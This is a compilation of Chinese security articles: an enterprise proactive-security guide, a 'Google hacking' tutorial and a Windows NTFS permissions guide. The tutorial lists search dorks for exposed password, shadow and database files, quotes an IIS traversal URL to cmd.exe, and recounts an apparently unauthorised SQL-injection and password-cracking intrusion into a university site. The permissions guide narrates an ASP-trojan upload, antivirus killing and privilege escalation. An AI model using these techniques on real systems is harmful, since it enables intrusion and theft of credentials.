类似于防火墙或者反XX类软件(如反病毒、反垃圾邮件、反间谍软件等),都是属于被动型或者说是反应型安全措施。在攻击到来时,这类软件都会产生相应的对抗动作,它们可以作为整个安全体系的一部分,但是,你还需要建立一种具有主动性的安全模型,防护任何未知的攻击,保护网络安全。另外,虽然在安全方面时刻保持警惕是非常必要的,但是事实上很少有企业有能力24小时不间断的派人守护网络。
在实现一个具有主动性的网络安全架构前,你需要对现有的主流网络安全体系有一个大概的了解。防护方法包括四个方面:防火墙、VPN、反病毒软件,以及入侵检测系统(IDS)。防火墙可以检测数据包并试图阻止有问题的数据包,但是它并不能识别入侵,而且有时候会将有用的数据包阻止。VPN则是在两个不安全的计算机间建立起一个受保护的专用通道,但是它并不能保护网络中的资料。反病毒软件是与其自身的规则密不可分的,而且面对黑客攻击,基本没有什么反抗能力。同样,入侵检测系统也是一个纯粹的受激反应系统,在入侵发生后才会有所动作。
虽然这四项基本的安全措施对企业来说至关重要,但是实际上,一个企业也许花费了上百万购买和建立的防火墙、VPN、反病毒软件以及IDS系统,但是面对黑客所采用的"通用漏洞批露"(CVE)攻击方法却显得无能为力。CVE本质上说是应用程序内部的漏洞,它可以被黑客利用,用来攻击网络、窃取信息,并使网络瘫痪。据2004 E-Crime Survey(2004 电子犯罪调查)显示,90%的网络安全问题都是由于CVE引起的。
具有主动性的网络安全模式是对上述四种安全措施的综合管理,使得用户可以从这四种安全措施中获得最大的安全性,同时也是为用户添加一个漏洞管理系统。在这种系统中,一个更有效的防火墙可以正确的拦截数据资料。一个更有效的反病毒程序则更少机会被激活,因为攻击系统的病毒数量更少了。而IDS则成为了一个备份系统,因为很少人能入侵系统而激活报警机制。而使用漏洞管理系统来防止CVE带来的入侵则是整个系统最重要的部分。
为什么这么说呢?从上面提到的调查看,95%的攻击是由于系统的漏洞或对系统的错误配置而造成的。在现实生活中也是一样,大家都试图将窃贼拒之门外,而很少考虑到当盗贼已经进入屋子后该怎防护。正如你不会在外出时让大门敞开,为什么不给网络再加一把锁呢。
实现主动性的网络安全模型
那么作为一家企业的技术人员,你该如何保护企业的网络呢?下面我会介绍几个简单的步骤,帮助你实现一个具有主动性的安全网络。首先你需要开发一套安全策略,并强迫所有企业人员遵守这一规则。同时,你需要屏蔽所有的移 动设备,并开启无线网络的加密功能以增强网络的安全级别。为你的无线路由器打好补丁并确保防火墙可以正常工作是非常重要的。之后检查系统漏洞,如果发现漏洞就立即用补丁或其它方法将其保护起来,这样可以防止黑客利用这些漏洞窃取公司的资料,或者令你的网络瘫痪。以下是各个步骤的实现细节:
开发一个安全策略
实现良好的网络安全总是以一个能够起到作用的安全策略为开始的。就算这个安全策略只有一页,公司的全体人员包括总经理在内,都必须按照这个策略来执行。基本的规则包括从指导员工如何建立可靠的密码到业务连续计划以及灾难恢复计划(BCP和DRP)。比如,你应该有针对客户的财产和其它保密信息的备份策略,比如一个镜象系统,以便在灾难发生后可以迅速恢复数据。在有些情况,你的BCP和DRP也许需要一个"冷"或"热"的站点,以便当灾难发生或者有攻击时你可以快速将员工的工作重新定向到新的站点。执行一个共同的安全策略也就意味着你向具有主动性安全网络迈出了第一步。
减少对安全策略的破坏
不论是有限网络,还是笔记本或者无线设备,都很有可能出现破坏安全策略的情况。很多系统没有装防病毒软件、防火墙软件,同时却安装了很多点对点的传输程序(如Kazaa、Napster、Gnutella、BT、eMule等)以及即时消息软件等,它们都是网络安全漏洞的根源。因此,你必须强制所有的终端安装反病毒软件,并开启Windows XP内建的防火墙,或者安装商业级的桌面防火墙软件,同时卸载点对点共享程序以及乱七八糟的聊天软件。
封锁移 动设备
对于企业的网络来说,最大的威胁可能就是来自那些随处移 动的笔记本或其它移 动终端,它们具有网络的接入权限,可以随时接入公司的网络。但是正因为它们具有移 动特性,可以随着员工迁移到其它不安全的网络并暴露在黑客的攻击之下,当这些笔记本电脑再次回到公司的网络环境时,就成了最大的安全隐患。其它无线终端也和笔记本有类似的情况。
据Forrester Research调查,到2005年,世界总共将有3500万移 动设备用户,而到2010年,这个数字将增加到150亿。我们不是数学家,不需要具体算出到底这些移 动设备会给企业的网络增加多少受攻击的几率,只需要知道这将是企业网络安全所面临的巨大考验。任何一个系统都有可能由于未经验证的用户的访问而被感染。
通过安全策略,你可以让网络针对无线终端具有更多的审核,比如快速检测到无线终端的接入,然后验证这些终端是否符合你的安全策略,是否是经过认证的用户,是否有明显的系统漏洞等。
开启无线网络加密功能
在无线网络系统中,无线网络加密 (Wireless Encryption,WEP)应该处于开启状态,并应该设置为最高安全级别。而且管理者的用户名和密码需要经常及时更换。但是这些措施也并不能够完全防止黑客通过你的无线路由器入侵企业内部网络。这是由于在大多数无线路由器中,都包含有目前尚未被修补的CVE,黑客可以利用这些CVE进行攻击。一些高级的黑客会下载免费的工具对这些漏洞进行更高级的利用,以此完全攻破你的安全系统。
为无线路由器打补丁,并使用其自带的防火墙功能
我强烈建议用户在使用无线路由器时及时更新产品的固件,而且如果无线路由器有内置防火墙功能,一定学习如何使用并配置它,开启这个防火墙。你也可以限制同时接入无线路由器的用户数量,如果企业员工数量不是很多,完全没有必要让路由器设置为可以接纳无限多的用户。比如企业只有十五个员工,那么就设置无线路由器只能同时接入十五个连接好了。
设置你的防火墙
虽然防火墙并没有特别强的安全主动性,但是它可以很好的完成自己该做的那份工作。你应该为防火墙设置智能化的规则,以便关闭那些可能成为黑客入侵途径的端口。比如1045端口就是SASSER蠕虫的攻击端口,因此你需要为防火墙建立规则,屏蔽所有系统上的1045端口。另外,当笔记本或其它无线设备连接到网络中时,防火墙也应该具有动态的规则来屏蔽这些移 动终端的危险端口。
下载安装商业级的安全工具
目前与安全有关的商业软件相当丰富,你可以从网上下载相应的产品来帮助你保护企业网络。这类产品从安全策略模板到反病毒、反垃圾邮件程序等,应有尽有。微软也针对系统的漏洞不断给出升级补丁。所有这些工具都可以有效地提升网络的安全等级,因此你应该充分利用它们。
禁止潜在的可被黑客利用的对象
"浏览器助手(BHO)"是最常见的可被黑客利用的对象。它一般用来监测用户的页面导航情况以及监控文件下载。BHO一般是在用户不知情的情况下被安装在系统中的,由于它可以将外界的信息存入你的系统,因此对网络安全来说是一个威胁。有些人利用BHO对象开发出了间谍软件,并尽量将起隐藏起来。一般来说,间谍软件都会不断变种,尽量避免被流行的间谍软件检测程序所发现,直到间谍软件检测程序进行了升级。如果你想看看自己的系统中到底有多少BHO,可以从Definitive Solutions公司的网站上下载BHODemon工具进行检测。
BHO是通过ADODB流对象在IE中运行的。通过禁止ADODB流对象,你就可以防止BHO写入文件、运行程序以及在你的系统上进行其它一些动作。要禁止ADODB流对象,你可以访问微软的技术支持页面:support.microsoft.com/default.aspx?kbid=870669。
留意最新的威胁
据计算机安全协会 (CSI)表示,2002 CSI/FBI计算机犯罪和安全调查显示,"计算机犯罪和信息安全的威胁仍然不衰退,并且趋向于金融领域"。因此,你需要时刻留意网络上的最新安全信息,以便保护自己的企业。网络上很多地方可以提供最新的安全信息,比如www.us-cert.gov 和www.sans.org 。
弥补已知的漏洞
系统上已知的漏洞被称为"通用漏洞批露"(CVEs),它是由MITRE组织汇编整理的漏洞信息。通过打补丁或其它措施,你可以将网络中所有系统的CVE漏洞弥补好。目前通过工具软件,你可以快速检测系统的CVE漏洞并将其修补好。有关这方面更多的信息,你可以查阅cve.mitre.org网站。
总的来说,一个具有主动性的网络安全模型是以一个良好的安全策略为起点的。之后你需要确保这个安全策略可以被彻底贯彻执行。最后,由于移 动办公用户的存在,你的企业和网络经常处在变化中,你需要时刻比那些黑客、蠕虫、恶意员工以及各种互联网罪犯提前行动。要做到先行一步,你应该时刻具有主动性的眼光并在第一时刻更新的你安全策略,同时你要确保系统已经安装了足够的防护产品,来阻止黑客的各种进攻尝试。虽然安全性永远都不是百分之百的,但这样做足可以使你处于优势地位。
作者介绍: Gary S. Miliefsky是PredatorWatch, Inc公司的总经理兼CEO。他拥有CISSP认证,并且是美国国土安全部的创始人之一。
开启/关闭系统FSO支持方法
在DOS命令行状态输入以下命令:
关闭命令:RegSvr32 /u C:\WINDOWS\SYSTEM\scrrun.dll
打开命令:RegSvr32 C:\WINDOWS\SYSTEM\scrrun.dll
win2000系统:
在CMD命令行状态输入以下命令:
关闭命令:RegSvr32 /u C:\WINNT\SYSTEM32\scrrun.dll
打开命令:RegSvr32 C:\WINNT\SYSTEM32\scrrun.dll
google hacking的实现以及应用
文章属性:原创
文章提交:sniper (sniperhk_at_163.com)
google hacking的实现以及应用(上)
本文作者:sniper
文章出于:www.4ngel.net
日 期 : 05/01/26
修改/发布: 05/02/21
本文仅做于技术讨论于研究,请勿用做其他用途.
PS:庆祝一下暂时摆脱应试教育的魔爪,向那些打着素质教育暗地里搞应试教育的学校竖起中指!
前言
google hacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell什么的,并无太大实际用途.但是前段时间仔细啃了些资料才猛然发觉google hacking其实并非如此简单...
google hacking的简单实现
记得以前看见过一篇文章写的就是简单的通过用www.google.com来搜索dvbbs6.mdb或conn.inc来获得一些站点的敏感信息.其实使用google中的一些语法可以提供给我们更多的信息(当然也提供给那些习惯攻击的人更多他们所想要的.),下面就来介绍一些常用的语法.
intext:
这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含"动网"的网页.allintext:使用方法和intext类似.
intitle:
和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含"安全天使"的网页.同理allintitle:也同intitle类似.
cache:
搜索google里关于某些内容的缓存,有时候也许能找到一些好东西哦.
define:
搜索某个词语的定义,搜索:define:hacker,将返回关于hacker的定义.
filetype:
这个我要重点推荐一下,无论是撒网式攻击还是我们后面要说的对特定目标进行信息收集都需要用到这个.搜索指定类型的文件.例如输入:filetype:doc.将返回所有以doc结尾的文件URL.当然如果你找.bak、.mdb或.inc也是可以的,获得的信息也许会更丰富:)
info:
查找指定站点的一些基本信息.
inurl:
搜索我们指定的字符是否存在于URL中.例如输入:inurl:admin,将返回N个类似于这样的连接:http://www.xxx.com/xxx/admin,用来找管理员登陆的URL不错.allinurl也同inurl类似,可指定多个字符.
link:
例如搜索:inurl:www.4ngel.net可以返回所有和www.4ngel.net做了链接的URL.
site:
这个也很有用,例如:site:www.4ngel.net.将返回所有和4ngel.net这个站有关的URL.
对了还有一些操作符也是很有用的:
+ 把google可能忽略的字列如查询范围
- 把某个字忽略
~ 同意词
. 单一的通配符
* 通配符,可代表多个字母
"" 精确查询
下面开始说说实际应用(我个人还是比较习惯用google.com,以下内容均在google上搜索),对于一个居心叵测的攻击者来说,可能他最感兴趣的就是密码文件了.而google正因为其强大的搜索能力往往会把一些敏感信息透露给他们.用google搜索以下内容:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
有时候因为各种各样的原因一些重要的密码文件被毫无保护的暴露在网络上,如果被别有用心的人获得,那么危害是很大的.下面是我找到的一个FreeBSD系统的passwd文件(我已做过处理):
图一
同样可以用google来搜索一些具有漏洞的程序,例如ZeroBoard前段时间发现个文件代码泄露漏洞,我们可以用google来找网上使用这套程序的站点:
intext:ZeroBoard filetype:php
或者使用:
inurl:outlogin.php?_zb_path= site:.jp
来寻找我们所需要的页面.phpmyadmin是一套功能强大的数据库操作软件,一些站点由于配置失误,导致我们可以不使用密码直接对phpmyadmin进行操作.我们可以用google搜索存在这样漏洞的程序URL:
intitle:phpmyadmin intext:Create new database
图二
还记得http://www.xxx.com/_vti_bin/..%5C..%5C..%5C..%5C..%5C../winnt/system32/cmd.exe?dir吗?用google找找,你也许还可以找到很多古董级的机器。同样我们可以用这个找找有其他cgi漏洞的页面。
allinurl:winnt system32
图三
前面我们已经简单的说过可以用google来搜索数据库文件,用上一些语法来精确查找能够获得更多东西(access的数据库,mssql、mysql的连接文件等等).举个例子示例一下:
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
intitle:"index of" data //在一些配置不正确的apache+win32的服务器上经常出现这种情况
和上面的原理一样,我们还可以用google来找后台,方法就略了,举一反三即可,毕竟我写这篇文章的目的是让大家了解google hacking,而不是让你用google去破坏.安全是把双刃剑,关键在于你如何去运用.
google hacking的实现以及应用(下)
本文作者:sniper
文章出于:www.4ngel.net
日 期 : 05/01/26
本文仅做于技术讨论于研究,请勿用做其他用途.
本文的上半部分可在4ngel.net找到.
利用google完全是可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试。www.xxxx.com是全国著名大学之一,一次偶然的机会我决定对其站点进行一次测试(文中所涉及该学校的信息均已经过处理,请勿对号入座:).
首先用google先看这个站点的一些基本情况(一些细节部分就略去了):
site:xxxx.com
从返回的信息中,找到几个该校的几个系院的域名:
http://a1.xxxx.com
http://a2.xxxx.com
http://a3.xxxx.com
http://a4.xxxx.com
顺便ping了一下,应该是在不同的服务器.(想想我们学校就那一台可怜的web服务器,大学就是有钱,汗一个)。学校一般都会有不少好的资料,先看看有什么好东西没:
site:xxxx.com filetype:doc
得到N个不错的doc。先找找网站的管理后台地址:
site:xxxx.com intext:管理
site:xxxx.com inurl:login
site:xxxx.com intitle:管理
超过获得2个管理后台地址:
http://a2.xxxx.com/sys/admin_login.asp
http://a3.xxxx.com:88/_admin/login_in.asp
还算不错,看看服务器上跑的是什么程序:
site:a2.xxxx.com filetype:asp
site:a2.xxxx.com filetype:php
site:a2.xxxx.com filetype:aspx
site:a3.xxxx.com filetype:asp
site:.......
......
a2服务器用的应该是IIS,上面用的是asp的整站程序,还有一个php的论坛
a3服务器也是IIS,aspx+asp。web程序都应该是自己开发的。有论坛那就看看能不能遇见什么公共的FTP帐号什么的:
site:a2.xxxx.com intext:ftp://*:*
没找到什么有价值的东西。再看看有没有上传一类的漏洞:
site:a2.xxxx.com inurl:file
site:a3.xxxx.com inurl:load
在a2上发现一个上传文件的页面:
http://a2.xxxx.com/sys/uploadfile.asp
用IE看了一下,没权限访问。试试注射,
site:a2.xxxx.com filetype:asp
得到N个asp页面的地址,体力活就让软件做吧,这套程序明显没有对注射做什么防范,dbowner权限,虽然不高但已足矣,back a shell我不太喜欢,而且看起来数据库的个头就不小,直接把web管理员的密码暴出来再说,MD5加密过。一般学校的站点的密码都比较有规律,通常都是域名+电话一类的变形,用google搞定吧。
site:xxxx.com //得到N个二级域名
site:xxxx.com intext:*@xxxx.com //得到N个邮件地址,还有邮箱的主人的名字什么的
site:xxxx.com intext:电话 //N个电话
把什么的信息做个字典吧,挂上慢慢跑。过了一段时间就跑出4个帐号,2个是学生会的,1个管理员,还有一个可能是老师的帐号。登陆上去:
name:网站管理员
pass:a2xxxx7619 //说了吧,就是域名+4个数字
要再怎么提权那就不属于本文讨论访问了,呵呵,到此为止。
关于google hacking的防范:
以前我们站的晓风·残月写过一篇躲避google的文章,原理就是通过在站点根目录下建立一个robots.txt以避免网络机器人获得一些敏感的信息,具体大家看原文章:http://www.4ngel.net/article/26.htm。
不过这种方法我个人不推荐,有点此地无银三百两的味道。简单一点的方法就是上google把自己站点的一些信息删除掉,访问这个URL:
http://www.google.com/remove.html
前几天看见又有人讨论用程序来欺骗robot的方法,我觉得可以试试:
代码如下:
<?php
if (strstr($_SERVER['HTTP_USER_AGENT'], "Googlebot"))
{
header("HTTP/1.1 301");
header("Location: http://www.google.com");
}
?>
asp的:
<%
if instr(Request.Servervariables("HTTP_USER_AGENT"),"Googlebot") then
response.redirect("http://www.google.com")
end if
%>
后记
这段时间在国外的一些google hack的研究站点看了看,其实也都差不多是一些基本语法的灵活运用,或者配合某个脚本漏洞,主要还是靠个人的灵活思维。国外对于google hack方面的防范也并不是很多,所以大家还是点到为止,不要去搞破坏拉,呵呵。对于一些在win上跑
apache的网管们应该多注意一下这方面,一个intitle:index of就差不多都出来了:)
Windows下权限设置详解
文章属性:原创
文章提交:mrcool (mrcoolfuyu_at_tom.com)
随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。难道我们真的无能为力了吗?其实,只要你弄明白了NTFS系统下的权限设置问题,我们可以对crackers们说:NO!
要打造一台安全的WEB服务器,那么这台服务器就一定要使用NTFS和Windows NT/2000/2003。众所周知,Windows是一个支持多用户、多任务的操作系统,这是权限设置的基础,一切权限设置都是基于用户和进程而言的,不同的用户在访问这台计算机时,将会有不同的权限。DOS是个单任务、单用户的操作系统。但是我们能说DOS没有权限吗?不能!当我们打开一台装有DOS操作系统的计算机的时候,我们就拥有了这个操作系统的管理员权限,而且,这个权限无处不在。所以,我们只能说DOS不支持权限的设置,不能说它没有权限。随着人们安全意识的提高,权限设置随着NTFS的发布诞生了。
Windows NT里,用户被分成许多组,组和组之间都有不同的权限,当然,一个组的用户和用户之间也可以有不同的权限。下面我们来谈谈NT中常见的用户组。
Administrators,管理员组,默认情况下,Administrators中的用户对计算机/域有不受限制的完全访问权。分配给该组的默认权限允许对整个系统进行完全控制。所以,只有受信任的人员才可成为该组的成员。
Power Users,高级用户组,Power Users 可以执行除了为 Administrators 组保留的任务外的其他任何操作系统任务。分配给 Power Users 组的默认权限允许 Power Users 组的成员修改整个计算机的设置。但Power Users 不具有将自己添加到 Administrators 组的权限。在权限设置中,这个组的权限是仅次于Administrators的。
Users:普通用户组,这个组的用户无法进行有意或无意的改动。因此,用户可以运行经过验证的应用程序,但不可以运行大多数旧版应用程序。Users 组是最安全的组,因为分配给该组的默认权限不允许成员修改操作系统的设置或用户资料。Users 组提供了一个最安全的程序运行环境。在经过 NTFS 格式化的卷上,默认安全设置旨在禁止该组的成员危及操作系统和已安装程序的完整性。用户不能修改系统注册表设置、操作系统文件或程序文件。Users 可以关闭工作站,但不能关闭服务器。Users 可以创建本地组,但只能修改自己创建的本地组。
Guests:来宾组,按默认值,来宾跟普通Users的成员有同等访问权,但来宾帐户的限制更多。
Everyone:顾名思义,所有的用户,这个计算机上的所有用户都属于这个组。
其实还有一个组也很常见,它拥有和Administrators一样、甚至比其还高的权限,但是这个组不允许任何用户的加入,在察看用户组的时候,它也不会被显示出来,它就是SYSTEM组。系统和系统级的服务正常运行所需要的权限都是靠它赋予的。由于该组只有这一个用户SYSTEM,也许把该组归为用户的行列更为贴切。
权限是有高低之分的,有高权限的用户可以对低权限的用户进行操作,但除了Administrators之外,其他组的用户不能访问 NTFS 卷上的其他用户资料,除非他们获得了这些用户的授权。而低权限的用户无法对高权限的用户进行任何操作。
我们平常使用计算机的过程当中不会感觉到有权限在阻挠你去做某件事情,这是因为我们在使用计算机的时候都用的是Administrators中的用户登陆的。这样有利也有弊,利当然是你能去做你想做的任何一件事情而不会遇到权限的限制。弊就是以 Administrators 组成员的身份运行计算机将使系统容易受到特洛伊木马、病毒及其他安全风险的威胁。访问 Internet 站点或打开电子邮件附件的简单行动都可能破坏系统。不熟悉的 Internet 站点或电子邮件附件可能有特洛伊木马代码,这些代码可以下载到系统并被执行。如果以本地计算机的管理员身份登录,特洛伊木马可能使用管理访问权重新格式化您的硬盘,造成不可估量的损失,所以在没有必要的情况下,最好不用Administrators中的用户登陆。Administrators中有一个在系统安装时就创建的默认用户----Administrator,Administrator 帐户具有对服务器的完全控制权限,并可以根据需要向用户指派用户权利和访问控制权限。因此强烈建议将此帐户设置为使用强密码。永远也不可以从 Administrators 组删除 Administrator 帐户,但可以重命名或禁用该帐户。由于大家都知道"管理员"存在于许多版本的 Windows 上,所以重命名或禁用此帐户将使恶意用户尝试并访问该帐户变得更为困难。对于一个好的服务器管理员来说,他们通常都会重命名或禁用此帐户。Guests用户组下,也有一个默认用户----Guest,但是在默认情况下,它是被禁用的。如果没有特别必要,无须启用此账户。我们可以通过"控制面板"--"管理工具"--"计算机管理"--"用户和用户组"来查看用户组及该组下的用户。
我们用鼠标右键单击一个NTFS卷或NTFS卷下的一个目录,选择"属性"--"安全"就可以对一个卷,或者一个卷下面的目录进行权限设置,此时我们会看到以下七种权限:完全控制、修改、读取和运行、列出文件夹目录、读取、写入、和特别的权限。"完全控制"就是对此卷或目录拥有不受限制的完全访问。地位就像Administrators在所有组中的地位一样。选中了"完全控制",下面的五项属性将被自动被选中。"修改"则像Power users,选中了"修改",下面的四项属性将被自动被选中。下面的任何一项没有被选中时,"修改"条件将不再成立。"读取和运行"就是允许读取和运行在这个卷或目录下的任何文件,"列出文件夹目录"和"读取"是"读取和运行"的必要条件。"列出文件夹目录"是指只能浏览该卷或目录下的子目录,不能读取,也不能运行。"读取"是能够读取该卷或目录下的数据。"写入"就是能往该卷或目录下写入数据。而"特别"则是对以上的六种权限进行了细分。读者可以自行对"特别"进行更深的研究,鄙人在此就不过多赘述了。
下面我们对一台刚刚安装好操作系统和服务软件的WEB服务器系统和其权限进行全面的刨析。服务器采用Windows 2000 Server版,安装好了SP4及各种补丁。WEB服务软件则是用了Windows 2000自带的IIS 5.0,删除了一切不必要的映射。整个硬盘分为四个NTFS卷,C盘为系统卷,只安装了系统和驱动程序;D盘为软件卷,该服务器上所有安装的软件都在D盘中;E盘是WEB程序卷,网站程序都在该卷下的WWW目录中;F盘是网站数据卷,网站系统调用的所有数据都存放在该卷的WWWDATABASE目录下。这样的分类还算是比较符合一台安全服务器的标准了。希望各个新手管理员能合理给你的服务器数据进行分类,这样不光是查找起来方便,更重要的是这样大大的增强了服务器的安全性,因为我们可以根据需要给每个卷或者每个目录都设置不同的权限,一旦发生了网络安全事故,也可以把损失降到最低。当然,也可以把网站的数据分布在不同的服务器上,使之成为一个服务器群,每个服务器都拥有不同的用户名和密码并提供不同的服务,这样做的安全性更高。不过愿意这样做的人都有一个特点----有钱:)。好了,言归正传,该服务器的数据库为MS-SQL,MS-SQL的服务软件SQL2000安装在d:\ms-sqlserver2K目录下,给SA账户设置好了足够强度的密码,安装好了SP3补丁。为了方便网页制作员对网页进行管理,该网站还开通了FTP服务,FTP服务软件使用的是SERV-U 5.1.0.0,安装在d:\ftpservice\serv-u目录下。杀毒软件和防火墙用的分别是Norton Antivirus和BlackICE,路径分别为d:\nortonAV和d:\firewall\blackice,病毒库已经升级到最新,防火墙规则库定义只有80端口和21端口对外开放。网站的内容是采用动网7.0的论坛,网站程序在e:\www\bbs下。细心的读者可能已经注意到了,安装这些服务软件的路径我都没有采用默认的路径或者是仅仅更改盘符的默认路径,这也是安全上的需要,因为一个黑客如果通过某些途径进入了你的服务器,但并没有获得管理员权限,他首先做的事情将是查看你开放了哪些服务以及安装了哪些软件,因为他需要通过这些来提升他的权限。一个难以猜解的路径加上好的权限设置将把他阻挡在外。相信经过这样配置的WEB服务器已经足够抵挡大部分学艺不精的黑客了。读者可能又会问了:"这根本没用到权限设置嘛!我把其他都安全工作都做好了,权限设置还有必要吗?"当然有!智者千虑还必有一失呢,就算你现在已经把系统安全做的完美无缺,你也要知道新的安全漏洞总是在被不断的发现。权限将是你的最后一道防线!那我们现在就来对这台没有经过任何权限设置,全部采用Windows默认权限的服务器进行一次模拟攻击,看看其是否真的固若金汤。
假设服务器外网域名为http://www.webserver.com,用扫描软件对其进行扫描后发现开放WWW和FTP服务,并发现其服务软件使用的是IIS 5.0和Serv-u 5.1,用一些针对他们的溢出工具后发现无效,遂放弃直接远程溢出的想法。打开网站页面,发现使用的是动网的论坛系统,于是在其域名后面加个/upfile.asp,发现有文件上传漏洞,便抓包,把修改过的ASP木马用NC提交,提示上传成功,成功得到WEBSHELL,打开刚刚上传的ASP木马,发现有MS-SQL、Norton Antivirus和BlackICE在运行,判断是防火墙上做了限制,把SQL服务端口屏蔽了。通过ASP木马查看到了Norton Antivirus和BlackICE的PID,又通过ASP木马上传了一个能杀掉进程的文件,运行后杀掉了Norton Antivirus和BlackICE。再扫描,发现1433端口开放了,到此,便有很多种途径获得管理员权限了,可以查看网站目录下的conn.asp得到SQL的用户名密码,再登陆进SQL执行添加用户,提管理员权限。也可以抓SERV-U下的ServUDaemon.ini修改后上传,得到系统管理员权限。还可以传本地溢出SERV-U的工具直接添加用户到Administrators等等。大家可以看到,一旦黑客找到了切入点,在没有权限限制的情况下,黑客将一帆风顺的取得管理员权限。
那我们现在就来看看Windows 2000的默认权限设置到底是怎样的。对于各个卷的根目录,默认给了Everyone组完全控制权。这意味着任何进入电脑的用户将不受限制的在这些根目录中为所欲为。系统卷下有三个目录比较特殊,系统默认给了他们有限制的权限,这三个目录是Documents and settings、Program files和Winnt。对于Documents and settings,默认的权限是这样分配的:Administrators拥有完全控制权;Everyone拥有读&运,列和读权限;Power users拥有读&运,列和读权限;SYSTEM同Administrators;Users拥有读&运,列和读权限。对于Program files,Administrators拥有完全控制权;Creator owner拥有特殊权限;Power users有完全控制权;SYSTEM同Administrators;Terminal server users拥有完全控制权,Users有读&运,列和读权限。对于Winnt,Administrators拥有完全控制权;Creator owner拥有特殊权限;Power users有完全控制权;SYSTEM同Administrators;Users有读&运,列和读权限。而非系统卷下的所有目录都将继承其父目录的权限,也就是Everyone组完全控制权!
现在大家知道为什么我们刚刚在测试的时候能一帆风顺的取得管理员权限了吧?权限设置的太低了!一个人在访问网站的时候,将被自动赋予IUSR用户,它是隶属于Guest组的。本来权限不高,但是系统默认给的Everyone组完全控制权却让它"身价倍增",到最后能得到Administrators了。那么,怎样设置权限给这台WEB服务器才算是安全的呢?大家要牢记一句话:"最少的服务+最小的权限=最大的安全"对于服务,不必要的话一定不要装,要知道服务的运行是SYSTEM级的哦,对于权限,本着够用就好的原则分配就是了。对于WEB服务器,就拿刚刚那台服务器来说,我是这样设置权限的,大家可以参考一下:各个卷的根目录、Documents and settings以及Program files,只给Administrator完全控制权,或者干脆直接把Program files给删除掉;给系统卷的根目录多加一个Everyone的读、写权;给e:\www目录,也就是网站目录读、写权。最后,还要把cmd.exe这个文件给挖出来,只给Administrator完全控制权。经过这样的设置后,再想通过我刚刚的方法入侵这台服务器就是不可能完成的任务了。可能这时候又有读者会问:"为什么要给系统卷的根目录一个Everyone的读、写权?网站中的ASP文件运行不需要运行权限吗?"问的好,有深度。是这样的,系统卷如果不给Everyone的读、写权的话,启动计算机的时候,计算机会报错,而且会提示虚拟内存不足。当然这也有个前提----虚拟内存是分配在系统盘的,如果把虚拟内存分配在其他卷上,那你就要给那个卷Everyone的读、写权。ASP文件的运行方式是在服务器上执行,只把执行的结果传回最终用户的浏览器,这没错,但ASP文件不是系统意义上的可执行文件,它是由WEB服务的提供者----IIS来解释执行的,所以它的执行并不需要运行的权限。
经过上面的讲解以后,你一定对权限有了一个初步了了解了吧?想更深入的了解权限,那么权限的一些特性你就不能不知道了,权限是具有继承性、累加性 、优先性、交叉性的。
继承性是说下级的目录在没有经过重新设置之前,是拥有上一级目录权限设置的。这里还有一种情况要说明一下,在分区内复制目录或文件的时候,复制过去的目录和文件将拥有它现在所处位置的上一级目录权限设置。但在分区内移动目录或文件的时候,移动过去的目录和文件将拥有它原先的权限设置。
累加是说如一个组GROUP1中有两个用户USER1、USER2,他们同时对某文件或目录的访问权限分别为"读取"和"写入",那么组GROUP1对该文件或目录的访问权限就为USER1和USER2的访问权限之和,实际上是取其最大的那个,即"读取"+"写入"="写入"。 又如一个用户USER1同属于组GROUP1和GROUP2,而GROUP1对某一文件或目录的访问权限为"只读"型的,而GROUP2对这一文件或文件夹的访问权限为"完全控制"型的,则用户USER1对该文件或文件夹的访问权限为两个组权限累加所得,即:"只读"+"完全控制"="完全控制"。
优先性,权限的这一特性又包含两种子特性,其一是文件的访问权限优先目录的权限,也就是说文件权限可以越过目录的权限,不顾上一级文件夹的设置。另一特性就是"拒绝"权限优先其它权限,也就是说"拒绝"权限可以越过其它所有其它权限,一旦选择了"拒绝"权限,则其它权限也就不能取任何作用,相当于没有设置。
交叉性是指当同一文件夹在为某一用户设置了共享权限的同时又为用户设置了该文件夹的访问权限,且所设权限不一致时,它的取舍原则是取两个权限的交集,也即最严格、最小的那种权限。如目录A为用户USER1设置的共享权限为"只读",同时目录A为用户USER1设置的访问权限为"完全控制",那用户USER1的最终访问权限为"只读"。
权限设置的问题我就说到这了,在最后我还想给各位读者提醒一下,权限的设置必须在NTFS分区中才能实现的,FAT32是不支持权限设置的。同时还想给各位管理员们一些建议:
1.养成良好的习惯,给服务器硬盘分区的时候分类明确些,在不使用服务器的时候将服务器锁定,经常更新各种补丁和升级杀毒软件。
2.设置足够强度的密码,这是老生常谈了,但总有管理员设置弱密码甚至空密码。
3.尽量不要把各种软件安装在默认的路径下
4.在英文水平不是问题的情况下,尽量安装英文版操作系统。
5.切忌在服务器上乱装软件或不必要的服务。
6.牢记:没有永远安全的系统,经常更新你的知识。